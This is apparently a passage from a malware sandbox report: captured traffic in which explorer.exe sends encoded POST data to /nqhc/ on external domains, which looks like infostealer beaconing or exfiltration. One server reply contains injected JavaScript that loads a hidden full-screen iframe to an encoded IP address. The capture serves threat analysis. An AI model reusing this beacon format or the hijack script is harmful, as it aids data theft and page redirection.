                                                                                                                                                                                    Data Ascii: 2iRIR4HHDZ~MPuLGtGnSW6LuMGrgWZF6~RFixq9qKDDFcdk2knzSDjyqMyA_K_H_0OaoSJyQa4HpLfqfgOo2csKqLGa9ivihOFSIamp_maT1Pg87K6b6k32_mCr4Ss(A6Xh2mZ~nt4S5rGsHOHTZBiBJMNRE7TafWy9ULsrEuUh65EEXkVKlKFIaTBKyry5UArSf3DKv1bwWgVcpbWA8gM7oVJ3zOJZfWCLPxkOUrUA-RmMy51I
                                                                                                                                                                                    Nov 21, 2022 19:25:02.712335110 CET2012OUTData Raw: 52 45 52 63 58 53 39 59 44 65 63 5f 35 74 4a 65 6b 6f 6c 58 50 35 57 62 28 5a 36 47 5a 6a 6f 4a 7a 64 61 64 47 64 50 2d 35 46 55 52 33 42 7a 33 43 61 43 48 73 72 34 31 51 36 32 63 6d 55 76 4b 74 36 53 65 43 2d 79 48 39 58 39 76 33 35 51 44 45 7a
                                                                                                                                                                                    Data Ascii: RERcXS9YDec_5tJekolXP5Wb(Z6GZjoJzdadGdP-5FUR3Bz3CaCHsr41Q62cmUvKt6SeC-yH9X9v35QDEzf4krqiAPGF9fE9zL0UIZdgVzs0q6pDMPERd9E6m-a3cZ6ZLB7TCtXkKMFzA-4tmYbM2vxxN6qv2Ati3wtimDxeXfrvHwPC236MYbZaS94asEA0R4UCQn4FqvMu2pg8UgkGtLVWX4jYM_YhRzDGUP~uiTLSeZMu3TC


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    83192.168.11.2049909103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:04.539756060 CET2013OUTGET /nqhc/?r4txB=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.005404.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:25:04.714916945 CET2014INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:04 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 1741
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    ETag: "634bbb43-6cd"
                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 7d 63 61 74 63 68 28 65 29 7b 7d 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 74 72 79 7b 76 61 72 20 74 61 67 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 74 61 67 4e 61 6d 65 3b 76 61 72 20 6d 79 69 64 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 69 64 3b 69 66 28 6d 79 69 64 21 3d 22 69 63 6f
                                                                                                                                                                                    Data Ascii: <html><head><meta charset="UTF-8"/><title>404 Not Found</title><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title =""}</script><link rel="icon" type="image/x-icon" href="http://45.122.138.45/favicon.ico"><script>document.writeln('');var ss='<div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="100%" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#52;&#53;&#46;&#49;&#50;&#50;&#46;&#49;&#51;&#56;&#46;&#52;&#53;&#47;"></iframe></div><style type="text/css">html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden}</style>';eval("document.write('"+ss+"');");try{setInterval(function(){try{document.getElementById("divAll").style.display="none"}catch(e){}for(var i=0;i<document.body.children.length;i++){try{var tagname=document.body.children[i].tagName;var myid=document.body.children[i].id;if(myid!="ico
                                                                                                                                                                                    Nov 21, 2022 19:25:04.714986086 CET2015INData Raw: 6e 44 69 76 31 22 26 26 6d 79 69 64 21 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 29 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 68 69 6c 64 72 65 6e 5b 69 5d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65
                                                                                                                                                                                    Data Ascii: nDiv1"&&myid!="showcloneshengxiaon"){document.body.children[i].style.display="none"}}catch(e){}}},100)}catch(e){}</script><script>(function(){var bp=document.createElement('script');var curProtocol=window.location.protocol.split(':')[0];if(cur


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    84192.168.11.204991066.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:17.945808887 CET2016OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gouldent.site
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 69 47 6b 58 47 74 4d 66 67 68 50 53 46 6d 38 41 36 78 53 4d 69 73 75 55 64 45 71 66 6c 7a 51 7a 4c 76 38 51 6b 57 70 4f 7a 6e 4c 73 73 6f 28 32 67 50 61 6f 32 2d 28 7a 33 5a 6e 6d 39 4d 6f 6f 49 54 55 51 6d 66 6d 4d 32 39 77 75 7a 48 73 6d 51 31 41 73 53 54 52 34 77 4a 68 4f 6c 55 4f 41 52 56 74 32 32 55 52 66 59 6d 69 72 47 63 33 5a 30 6e 4e 44 51 63 56 4b 48 4c 45 38 46 68 55 58 79 4d 62 6f 43 47 6a 75 37 37 39 63 75 30 4e 7a 7e 77 6c 30 68 49 45 69 62 79 4b 55 4c 49 4e 44 73 67 75 6a 6a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=4aNeThNKxkEEiGkXGtMfghPSFm8A6xSMisuUdEqflzQzLv8QkWpOznLsso(2gPao2-(z3Znm9MooITUQmfmM29wuzHsmQ1AsSTR4wJhOlUOARVt22URfYmirGc3Z0nNDQcVKHLE8FhUXyMboCGju779cu0Nz~wl0hIEibyKULINDsgujjg).
                                                                                                                                                                                    Nov 21, 2022 19:25:18.234039068 CET2017INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:18 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    85192.168.11.204991166.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:20.135612965 CET2018OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gouldent.site
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 30 7a 49 4b 59 51 32 44 46 4f 77 6e 4c 73 7e 49 28 33 76 76 62 6d 32 35 32 4f 33 64 6e 6d 39 49 34 6f 49 67 73 51 33 5f 6d 50 39 64 77 70 30 48 73 6c 62 56 41 6d 53 54 64 56 77 49 6c 4f 6c 46 69 41 51 58 46 32 79 41 46 63 64 47 69 70 54 4d 33 59 7e 48 4e 6b 51 63 6f 31 48 4b 74 48 45 54 49 58 79 73 37 6f 51 57 6a 68 68 37 38 55 78 45 4d 74 78 69 45 62 6d 70 45 4b 4d 51 61 7a 4b 72 51 51 76 6b 47 70 28 4c 4f 6a 71 6d 59 78 4f 79 58 5f 33 67 42 44 4d 64 6a 41 57 33 69 50 48 54 39 67 4f 52 4f 36 68 6a 38 63 75 4d 53 6b 34 34 4d 6d 63 72 79 41 5a 45 37 57 65 4a 6b 4b 28 78 79 68 62 71 48 79 4b 6c 74 30 58 63 34 53 62 44 42 38 70 62 77 49 74 79 52 6f 78 4d 52 77 7a 32 65 71 56 5a 4b 37 58 31 32 61 51 67 58 6a 57 5a 67 68 6f 37 30 6c 6b 61 66 65 32 34 4a 58 67 37 68 7a 70 56 35 4f 4e 51 4e 41 33 72 38 71 4a 34 46 46 7e 54 6a 74 4a 55 59 6c 36 47 31 45 73 63 7e 5f 46 48 61 39 73 4c 65 72 76 2d 42 4c 36 44 33 6c 4f 77 79 5f 48 62 7a 6a 42 56 39 46 6a 4c 52 63 4b 61 65 71 6a 70 73 47 76 76 69 66 51 68 7e 38 56 30 75 75 63 33 48 69 38 5a 32 4c 43 78 4a 7a 30 36 43 75 35 31 43 67 77 66 34 76 73 36 4c 75 45 41 7e 4e 71 35 62 43 70 61 38 6d 58 7a 4e 31 75 48 76 4d 38 71 46 6a 61 4c 35 75 41 74 6e 77 71 30 67 35 49 58 79 50 5a 45 61 33 6c 46 32 42 70 64 77 50 7a 58 41 7a 67 38 58 57 54 79 4e 41 59 6d 67 30 54 4d 75 68 41 55 55 73 46 7a 6e 43 67 75 6b 44 78 48 49 79 37 6d 39 2d 7e 6a 6a 66 48 58 6a 58 74 73 30 67 78 73 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB0zIKYQ2DFOwnLs~I(3vvbm252O3dnm9I4oIgsQ3_mP9dwp0HslbVAmSTdVwIlOlFiAQXF2yAFcdGipTM3Y~HNkQco1HKtHETIXys7oQWjhh78UxEMtxiEbmpEKMQazKrQQvkGp(LOjqmYxOyX_3gBDMdjAW3iPHT9gORO6hj8cuMSk44MmcryAZE7WeJkK(xyhbqHyKlt0Xc4SbDB8pbwItyRoxMRwz2eqVZK7X12aQgXjWZgho70lkafe24JXg7hzpV5ONQNA3r8qJ4FF~TjtJUYl6G1Esc~_FHa9sLerv-BL6D3lOwy_HbzjBV9FjLRcKaeqjpsGvvifQh~8V0uuc3Hi8Z2LCxJz06Cu51Cgwf4vs6LuEA~Nq5bCpa8mXzN1uHvM8qFjaL5uAtnwq0g5IXyPZEa3lF2BpdwPzXAzg8XWTyNAYmg0TMuhAUUsFznCgukDxHIy7m9-~jjfHXjXts0gxs8.
                                                                                                                                                                                    Nov 21, 2022 19:25:20.859338045 CET2019INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:20 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Length: 570
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    86192.168.11.204991266.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:22.321582079 CET2026OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gouldent.site
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gouldent.site
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gouldent.site/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 34 61 4e 65 54 68 4e 4b 78 6b 45 45 77 32 30 58 56 65 6b 66 68 42 50 52 5a 57 38 41 30 52 53 49 69 73 69 55 64 46 75 50 6b 42 38 7a 4c 38 55 51 6b 30 78 4f 78 6e 4c 73 6c 49 28 79 76 76 62 72 32 5f 66 4a 33 64 72 51 39 4f 6b 6f 49 7a 45 51 33 4b 79 50 34 64 77 6f 37 6e 73 6e 51 31 41 79 53 54 52 61 77 49 67 31 6c 55 57 41 52 58 31 32 32 79 74 66 54 32 69 72 54 4d 33 63 36 48 4e 7a 51 63 74 6f 48 4b 68 48 45 52 38 58 7a 66 44 6f 44 31 62 68 31 62 38 56 6f 30 4e 74 34 43 45 36 6d 70 67 65 4d 51 61 46 4b 70 38 51 76 6a 79 70 7e 4d 36 69 70 47 59 78 51 43 58 34 7a 68 39 48 4d 64 76 75 57 33 57 50 48 52 74 67 4e 78 4f 36 6b 43 38 66 34 38 53 69 79 59 4e 67 57 4c 75 49 5a 41 54 43 65 49 41 4b 34 42 6d 68 61 5a 76 79 4d 48 4a 30 65 63 34 51 47 7a 42 76 6a 37 77 55 74 79 41 42 78 50 5a 61 7a 30 79 71 45 4c 53 37 54 55 32 56 48 77 57 71 61 35 68 37 73 37 78 6b 6b 61 75 66 32 34 4a 35 67 2d 52 7a 75 6b 4a 4f 4f 52 4e 48 30 37 39 44 42 59 45 48 30 7a 76 33 4a 55 73 39 36 46 31 55 73 64 32 5f 47 6e 61 39 75 73 4b 71 6c 4f 42 4d 6c 7a 32 71 54 67 79 57 48 63 37 4a 42 51 46 5f 69 34 46 63 4a 4f 36 71 70 5a 73 46 72 50 69 62 57 52 7e 2d 65 55 75 75 63 77 4f 62 38 5a 79 4c 43 6b 74 7a 30 4e 6d 75 70 32 61 67 32 66 34 74 73 36 4c 7a 45 41 69 45 71 35 43 56 70 61 73 41 58 77 39 31 75 57 28 4d 28 76 78 67 66 37 35 6e 53 64 6d 6f 31 6b 38 75 49 58 75 48 5a 41 47 34 6b 33 69 42 6f 64 41 50 69 48 41 79 79 73 58 56 62 53 4e 61 4a 32 63 53 54 4d 7a 55 41 55 49 47 46 30 62 43 73 70 51 55 32 6d 49 6b 76 77 68 72 34 47 76 76 48 52 6a 71 33 75 6f 52 6d 62 53 4d 41 54 44 71 78 61 78 56 4b 61 76 62 6e 32 34 2d 59 52 39 52 49 76 68 5f 28 6a 41 43 7a 39 72 6c 6d 6a 52 53 62 61 70 54 51 51 42 4e 77 76 44 79 7a 33 6d 35 7e 46 45 4d 6f 31 65 61 35 59 76 50 73 4a 4b 4e 4c 61 30 50 64 52 68 7a 52 65 69 72 63 69 37 4e 45 72 74 30 7a 41 72 2d 71 6a 6d 75 64 45 33 4c 43 66 42 41 43 52 53 4f 53 73 77 4d 55 32 59 61 52 71 5a 65 33 65 42 34 6e 34 6c 6e 31 66 33 66 43 5f 72 74 44 36 4c 4b 28 74 75 6f 42 5f 30 61 58 75 44 76 77 74 55 73 4d 66 48 66 6f 44 78 4d 33 4f 32 6b 68 78 44 35 6f 58 43 76 30 59 45 32 4f 71 31 41 76 65 77 4b 44 71 39 67 41 69 76 78 32 31 71 76 35 75 6b 59 42 65 65 5f 76 52 48 56 6c 62 37 56 68 6e 65 76 4f 31 71 68 46 4e 5a 78 41 4e 78 43 48 4a 48 69 66 59 32 69 31 75 6d 6f 79 73 30 71 4f 70 39 53 32 47 38 72 78 32 4d 79 6b 4c 65 70 68 6b 78 4d 45 64 7e 30 78 31 77 6e 74 33 41 36 31 34 53 33 64 72 67 52 78 64 4d 54 69 69 36 63 61 5f 35 55 52 76 28 41 50 57 4a 49 30 54 55 59 66 56 31 69 49 63 30 57 7e 37 55 50 78 74 58 2d 71 58 35 38 54 59 76 4c 45 51 6a 45 34 62 76 66 50 51 52 51 4c 76 7e 49 45 55 67 55 53 7a 35 4b 56 62 41 76 72 73 32 75 62 72 4f 39 68 57 6c 64 6a 4d 4e 6c 41 7a 69 53 41 5a 7a 30 6e 63 71 33 4b 69 56 4e 48 6c 54 38 76 36 61 65 4c 4f 4d 56 6b 34 4f 71 53 6e 4b 65 37 5a 35 5a 6a 71 28 6b 51 71 42 46 64 39 6c 44 41 49 68 44 33 53 43 59 76 5f 52 45 74 57 4f 4a 7a 37 28 68 39 79 4a 6b 55 67 43 7a 30 47 36 66 37 53 41 68 7a 6e 62 45 39 77 72 35 65 2d 41 4e 6a 32 39 4d 50 4f 45 4e 69 6b 32 4c 42 66 32 7a 53 70 55 65 33 39 79 78 68 6d 65 45 30 76 72 47 6f 6b 74 75 57 30 61 57 49 66 55 31 4d 67 5a 39 4a 34 74 50 31 50 43 37 7e 42 55 6a 4b 36 63 52 75 34 47 68 48 47 46 34 65 52 30 33 5a 4e 59 61 77 6f 67 35 50 41 71 68 4e 67 6a 4e 4a 31 56 79 58 73 31 6a 4f 59 68 4a 33 6c 35 54 34 4b 78 53 76 48 46 48 7a 42 67 61 6a 49 66 48 47 42 43 66 31 6f 75 49 48 7a 50 49 7a 45 77 4e 63 6a 43 66 56 4a 46 46 77 44 49 54 5a 2d 4a 6b 57 52 4b 77 7e 56 77 6b 47 55 57 31 78 4f 65 55 53 2d 37 44 6c 33 47 72 39 33 68 44 49 5a 42 2d 37 68 6a 62 50 44 41 68 6f 63 72 6b 57 55 47 67 5a 38 33 68 33 71 6d 70 6d 45 66 59 44 37 6f 6a 71 41 41 63 77 45 61 59 68 4e 58 6f 62 64 44 64 6d 74 77 69 76 33 73 4d 77 79 48 31 62 63 63 6f 34 45 63 62 39 72 4c 48 69 53 48 48 78 6d 6a 32 6d 72 67 59 32 